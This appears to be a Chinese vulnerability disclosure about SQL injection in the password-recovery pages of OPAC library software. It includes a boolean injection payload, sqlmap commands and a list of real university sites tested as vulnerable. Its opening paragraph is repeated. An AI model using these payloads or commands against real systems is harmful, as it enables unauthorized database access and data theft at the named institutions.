### 简要描述: 大量高校在使用该系统,测试了多个版本,都存在同样的问题。 ### 详细说明: 看了下你们用户列表中的高校,基本上都用的是4.5或5.0版本的,都有同样的问题,找回密码处存在注入。 [<img src="https://images.seebug.org/upload/201411/17130021d5e84091405bfb9f18183c46a6d72049.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/17130021d5e84091405bfb9f18183c46a6d72049.png) #1 OPAC V4.5 测试站点:http://210.27.80.82/reader/redr_mail.php [<img src="https://images.seebug.org/upload/201411/171300526f146449d0839c274b3e1adf9c344ae7.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/171300526f146449d0839c274b3e1adf9c344ae7.png) [<img src="https://images.seebug.org/upload/201411/171301009eaec2cda1ee9d8d106691873a55bf43.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/171301009eaec2cda1ee9d8d106691873a55bf43.png) 'or '1’=’1 时 和 ‘or ‘1’=’2 时返回不同,此处明显是存在注入的,是布尔型盲注。...
### 简要描述: 大量高校在使用该系统,测试了多个版本,都存在同样的问题。 ### 详细说明: 看了下你们用户列表中的高校,基本上都用的是4.5或5.0版本的,都有同样的问题,找回密码处存在注入。 [<img src="https://images.seebug.org/upload/201411/17130021d5e84091405bfb9f18183c46a6d72049.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/17130021d5e84091405bfb9f18183c46a6d72049.png) #1 OPAC V4.5 测试站点:http://210.27.80.82/reader/redr_mail.php [<img src="https://images.seebug.org/upload/201411/171300526f146449d0839c274b3e1adf9c344ae7.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/171300526f146449d0839c274b3e1adf9c344ae7.png) [<img src="https://images.seebug.org/upload/201411/171301009eaec2cda1ee9d8d106691873a55bf43.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/171301009eaec2cda1ee9d8d106691873a55bf43.png) 'or '1’=’1 时 和 ‘or ‘1’=’2 时返回不同,此处明显是存在注入的,是布尔型盲注。 拿出sqlmap跑跑,居然告诉我不能注入,不科学啊。反复修改参数试了几次,还是只能时间盲注,看来有时候神器也不好使。时间盲注就时间盲注吧,也比我自己动手快,尝试跑了下数据。 ``` Sqlmap -r 1.txt -p cert_id --dbms Oracle --level 3 ``` [<img src="https://images.seebug.org/upload/201411/17130218a4d9b7b387d9e215964eccc41e92223a.jpg" alt="图片4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/17130218a4d9b7b387d9e215964eccc41e92223a.jpg) [<img src="https://images.seebug.org/upload/201411/171302255e124430feed93825d05efa318e557d1.png" alt="图片5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/171302255e124430feed93825d05efa318e557d1.png) #2 OPAC V4.5 测试站点:http://opac.lib.ustc.edu.cn/reader/get_pwd.php [<img src="https://images.seebug.org/upload/201411/1713025761d057534ff0ff0950f9a660c5e83f65.png" alt="图片6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1713025761d057534ff0ff0950f9a660c5e83f65.png) 此处就真的只能时间盲注了。 ``` Sqlmap -r 2.txt -p cert_id --dbms Oracle --level 3 --technique T ``` [<img src="https://images.seebug.org/upload/201411/1713033506f6f788abd5a1f1b93f9e9046848797.jpg" alt="图片7.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1713033506f6f788abd5a1f1b93f9e9046848797.jpg) [<img src="https://images.seebug.org/upload/201411/1713034145420419c163836b11d980f6d0383a19.png" alt="图片8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1713034145420419c163836b11d980f6d0383a19.png) ### 漏洞证明: 测试过的其他案例: ``` http://210.27.80.82/reader/redr_mail.php http://opac.niit.edu.cn/reader/get_pwd.php http://mylib.cau.edu.cn/reader/get_pwd.php http://opac.forestpolice.net/reader/get_pwd.php http://opac.jsafc.net/reader/redr_mail.php http://opac.lib.xjtlu.edu.cn/reader/redr_mail.php http://202.119.185.6/reader/redr_mail.php ```
